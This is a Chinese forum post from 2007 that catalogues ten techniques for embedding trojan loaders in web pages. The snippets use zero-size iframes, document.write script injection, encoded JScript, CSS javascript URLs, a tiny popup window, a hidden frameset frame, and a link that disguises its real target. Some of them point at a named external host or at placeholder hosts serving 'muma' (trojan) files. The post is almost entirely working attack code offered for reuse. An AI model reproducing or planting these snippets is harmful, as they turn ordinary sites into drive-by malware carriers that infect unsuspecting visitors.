|
|
楼主 |
发表于 2007-12-31 04:46:19
|
显示全部楼层
|阅读模式
来自 内蒙古兴安盟乌兰浩特市
一:框架挂马
<iframe src=http://loveabu.hostfree.com.cn/web/muzi/qq.htm width=0 height=0></iframe>
二:js文件挂马
首先将以下代码
document.write(\"<iframe width='0' height='0' src='地址'></iframe>\");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
三:js变形加密
<SCRIPT language=\"JScript.Encode\" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马
<body ></body>
五:隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\\r\\n<iframe src=\"http://www.xxx.com/muma.htm/\"></iframe>';
六:css中挂马
body {
background-image: url('javascript:document.write(\"<script src=http://www.XXX.net/muma.js></script>\")')}
七:JAJA挂马
<SCRIPT language=javascript>
window.open (\"地址\",\"\",\"toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1\");
</script>
八:图片伪装
<html>
<iframe src=\"网马地址\" height=0 width=0></iframe>
<img src=\"图片地址\"></center>
</html>
九:伪装调用:
<frameset rows=\"444,0\" cols=\"*\">
<frame src=\"打开网页\" framborder=\"no\" scrolling=\"auto\" noresize marginwidth=\"0\"margingheight=\"0\">
<frame src=\"网马地址\" frameborder=\"no\" scrolling=\"no\" noresize marginwidth=\"0\"margingheight=\"0\">
</frameset>
十:高级欺骗
<a href=\"http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)\" > 页面要显示的内容 </a>
<SCRIPT Language=\"JavaScript\">
function www_163_com ()
{
var url=\"网马地址\";
open(url,\"NewWindow\",\"toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10\");
}
</SCRIPT> |
|
发表于 2008-1-8 10:37:20
